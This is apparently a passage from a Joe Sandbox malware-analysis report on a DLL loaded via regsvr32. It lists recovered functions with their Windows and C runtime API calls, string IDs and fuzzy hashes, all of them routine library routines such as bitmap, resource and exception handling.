                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1315500227-0
                                                                                                          • Opcode ID: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
                                                                                                          • Instruction ID: abcb09268cf445b2c35b0e2b56c0cfd5e9caec1888beec0722017402bcd9ce52
                                                                                                          • Opcode Fuzzy Hash: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
                                                                                                          • Instruction Fuzzy Hash: FC018F32500126BBEB219F559D48EAF3BACFF463A1F414165FD15D6060DB30DA829A98
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetMenuCheckMarkDimensions.USER32 ref: 1002099A
                                                                                                          • _memset.LIBCMT ref: 10020A12
                                                                                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
                                                                                                          • LoadBitmapA.USER32 ref: 10020A8D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271682439-3916222277
                                                                                                          • Opcode ID: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
                                                                                                          • Instruction ID: 8ec26202c106691d72478eed222520a6e30d1cb825b7d1c94e22465ec1c68f9d
                                                                                                          • Opcode Fuzzy Hash: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
                                                                                                          • Instruction Fuzzy Hash: BD312772A003669FFB10CF289CC5B9D7BB5FB44340F9540AAF549EB182DA709E848B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
                                                                                                          • GetSystemMetrics.USER32 ref: 10025168
                                                                                                          • GetSystemMetrics.USER32 ref: 1002516F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$Metrics$InfoParameters
                                                                                                          • String ID: B$DISPLAY
                                                                                                          • API String ID: 3136151823-3316187204
                                                                                                          • Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
                                                                                                          • Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
                                                                                                          • Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
                                                                                                          • Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 1003748E
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 1003749F
                                                                                                          • __getptd.LIBCMT ref: 100374AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: MOC$csm
                                                                                                          • API String ID: 803148776-1389381023
                                                                                                          • Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
                                                                                                          • Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
                                                                                                          • Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
                                                                                                          • Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
                                                                                                          • _memset.LIBCMT ref: 1002A78B
                                                                                                          • GetWindowTextA.USER32 ref: 1002A7A5
                                                                                                          • lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
                                                                                                          • SetWindowTextA.USER32(?,?), ref: 1002A7C3
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 289641511-0
                                                                                                          • Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
                                                                                                          • Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
                                                                                                          • Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
                                                                                                          • Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 10033049
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __amsg_exit.LIBCMT ref: 10033069
                                                                                                          • __lock.LIBCMT ref: 10033079
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 10033096
                                                                                                          • InterlockedIncrement.KERNEL32(04231600), ref: 100330C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271482742-0
                                                                                                          • Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
                                                                                                          • Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
                                                                                                          • Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
                                                                                                          • Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Fputc$H_prolog3_
                                                                                                          • String ID:
                                                                                                          • API String ID: 2569218679-3916222277
                                                                                                          • Opcode ID: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
                                                                                                          • Instruction ID: 327ff4da5823006f03605dc28747a7ba7b3d1cf190d8e7353a19ee1d8cd02c88
                                                                                                          • Opcode Fuzzy Hash: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
                                                                                                          • Instruction Fuzzy Hash: 74515CB6A046489BCB29CBA4C8919DEB7B5EF48310F31D539F552E7291EF70B808CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                            • Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpA,10027AEC,0000000C), ref: 100286CC
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 100286DC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                          • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                          • API String ID: 3274081130-63838506
                                                                                                          • Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
                                                                                                          • Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
                                                                                                          • Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
                                                                                                          • Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • ___BuildCatchObject.LIBCMT ref: 10037AF8
                                                                                                            • Part of subcall function 10037A53: ___BuildCatchObjectHelper.LIBCMT ref: 10037A89
                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 10037B0F
                                                                                                          • ___FrameUnwindToState.LIBCMT ref: 10037B1D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2163707966-1018135373
                                                                                                          • Opcode ID: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
                                                                                                          • Instruction ID: f623d6fd13c583f27d9dc74078cf60041b57e54907eb0ea25ac4e83ce510980d
                                                                                                          • Opcode Fuzzy Hash: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
                                                                                                          • Instruction Fuzzy Hash: 1301E475001109BFDF239E51CC41EAB7FAAFF08392F108014BD1C19121D736E9A1EBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                          • Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
                                                                                                          • Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
                                                                                                          • Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
                                                                                                          • Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100031BF
                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100031EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
                                                                                                          • Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
                                                                                                          • Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
                                                                                                          • Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10043377
                                                                                                          • _fgetc.LIBCMT ref: 100434AD
                                                                                                            • Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3
                                                                                                          • _memcpy_s.LIBCMT ref: 10043472
                                                                                                          • _ungetc.LIBCMT ref: 100434F8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 9762108-0
                                                                                                          • Opcode ID: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
                                                                                                          • Instruction ID: 13a944e20a8a26727cade03676e391ccd69925211a3dd35b2a339be84363c332
                                                                                                          • Opcode Fuzzy Hash: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
                                                                                                          • Instruction Fuzzy Hash: CF515C76A006089FCB15DBB4C8919DEB7B9FF48210F70953AE552E7191EE60F908CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __msize_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1288803200-0
                                                                                                          • Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
                                                                                                          • Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
                                                                                                          • Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
                                                                                                          • Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$__cftof
                                                                                                          • String ID:
                                                                                                          • API String ID: 887240167-0
                                                                                                          • Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
                                                                                                          • Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
                                                                                                          • Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
                                                                                                          • Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 100231B0
                                                                                                          • LockResource.KERNEL32(00000000), ref: 100231C2
                                                                                                          • FreeResource.KERNEL32(00000000), ref: 10023210
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1078018258-0
                                                                                                          • Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
                                                                                                          • Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
                                                                                                          • Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
                                                                                                          • Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 100217B5
